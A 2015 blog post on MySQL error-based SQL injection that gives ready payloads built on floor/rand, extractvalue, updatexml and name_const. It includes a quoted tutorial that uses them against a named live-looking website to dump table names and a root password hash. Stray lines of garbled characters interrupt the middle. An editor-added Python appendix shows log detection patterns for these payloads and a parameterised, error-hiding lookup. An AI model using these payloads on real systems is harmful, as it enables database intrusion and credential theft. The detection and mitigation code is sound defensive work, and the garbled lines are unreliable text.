MySQL: three error-based injection methods using floor, ExtractValue and UpdateXml

Posted 2015-11-11 19:03:37

1. Errors via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:
First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error.

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is disclosed in the error message. To retrieve other data, replace version() with the desired subquery.
For example, to retrieve the administrator username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'



Further collected material:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection on newer MySQL versions: injecting with NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

|------|
| TEST |
|------|
|    1 |
|------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'

Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here, if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'
: A7 B! `0 M, B3 x2 m

" n! [( \9 y9 g, T0 N$ Z6 s) L% J6 S9 d! B& L, o7 I8 r

! e0 |. p8 Y& E6 {' i0 N; F- I- ~2 H* l) |2 Z! ?5 L% G0 C
, _; W+ P* {7 h
: Y" O3 d* X- j* Q
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.5 F% r# R; \  n% [& l+ u* N# Z

' W$ D) f! O, e9 _: L  ZLet's get the columns out of the user table..; K  S7 R( u% c7 W" i, T

$ H" i3 E: S, `  z/ W& V1 N" ]Code:/ q8 D1 G/ H0 Y  U5 C
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--+ w" b6 `, S7 b0 f4 Q/ K  X

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
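Added example from the editor, not code from the post or the quoted tutorial. Every technique above works only because the application (a) concatenates the id parameter into SQL and (b) echoes the database's own error text ("Duplicate entry ...", "XPATH syntax error: ...", "Duplicate column name ...") back to the client. The block shows the two defender-side responses: a log scanner that flags the four payload families (floor(rand(0)*2) with group by, extractvalue, updatexml, name_const) after URL decoding, and a hardened lookup that validates and binds the parameter and never reflects driver errors. SQLite stands in for MySQL so it runs offline; the log lines, table contents, handler names and INTERNAL_LOG are all constructed for the example.

```python
"""Detection and mitigation for error-based MySQL injection (editor's example)."""
import re
import sqlite3
from urllib.parse import unquote_plus

# --- 1. Detection: the function shapes the payloads above depend on. Matched
#        after decoding so '+' (space) and %XX encoding cannot hide them.
ERROR_BASED_PATTERNS = {
    "floor_rand_groupby": re.compile(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)", re.I),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
    "name_const": re.compile(r"\bname_const\s*\(", re.I),
}

def decode_request(raw):
    """Decode twice so a double-encoded payload is also seen in the clear.
    Over-decoding is harmless here because the result is only used for matching."""
    return unquote_plus(unquote_plus(raw))

def classify(line):
    """Return the names of the error-based families present in one log line."""
    decoded = decode_request(line)
    return [name for name, pat in ERROR_BASED_PATTERNS.items() if pat.search(decoded)]

def scan_log(lines):
    """Map the index of each flagged line to the families it matched."""
    flagged = {}
    for i, line in enumerate(lines):
        hits = classify(line)
        if hits:
            flagged[i] = hits
    return flagged

# Constructed access-log excerpt (request line and status only); the three
# injected requests mirror the payload shapes shown in the post.
SAMPLE_LOG = [
    "GET /content/detail.php?id=330 200",
    "GET /content/detail.php?id=330+and+1%3D(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- 500",
    "GET /content/detail.php?id=1+and+extractvalue(1,concat(0x5c,(select+user()))) 500",
    "GET /content/detail.php?id=1+and+(select+1+from+(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) 500",
]

# --- 2. Mitigation: bind the parameter, and keep driver error text server-side.
INTERNAL_LOG = []  # constructed stand-in for the server-side error log

def make_db():
    """In-memory SQLite table shaped like the post's 'article' table (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table article (id integer primary key, title text, content text)")
    conn.execute("insert into article values (1, 'test', 'do it')")
    return conn

def lookup_unsafe(conn, user_id):
    # The vulnerable shape from the post: the raw parameter becomes part of the SQL text.
    return conn.execute("select id, title from article where id = " + user_id).fetchall()

def lookup_safe(conn, user_id):
    # Hardened: enforce the expected type, then bind; the input never becomes SQL.
    article_id = int(user_id)  # raises ValueError for anything that is not an integer
    return conn.execute("select id, title from article where id = ?", (article_id,)).fetchall()

def respond(handler, conn, user_id):
    """Application boundary: database errors are logged internally, never echoed."""
    try:
        return {"ok": True, "rows": handler(conn, user_id)}
    except ValueError:
        return {"ok": False, "error": "invalid id"}       # rejected before any SQL ran
    except sqlite3.Error as exc:
        INTERNAL_LOG.append(str(exc))                     # detail stays on the server
        return {"ok": False, "error": "request failed"}   # generic message to the client

if __name__ == "__main__":
    print(scan_log(SAMPLE_LOG))
    db = make_db()
    probe = "1 and extractvalue(1, 'x')"   # constructed probe; SQLite has no such function
    print(respond(lookup_unsafe, db, probe), INTERNAL_LOG[-1:])
    print(respond(lookup_safe, db, probe))
    print(respond(lookup_safe, db, "1"))
```

With the unsafe handler the probe reaches the database and produces a driver error, which `respond` keeps in INTERNAL_LOG and replaces with a generic message; with the safe handler the probe never reaches SQL at all. On a real MySQL deployment the same boundary is what stops the "Duplicate entry" and "XPATH syntax error" strings from acting as a data channel, and the scanner gives the SOC a way to spot attempts in existing access logs.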
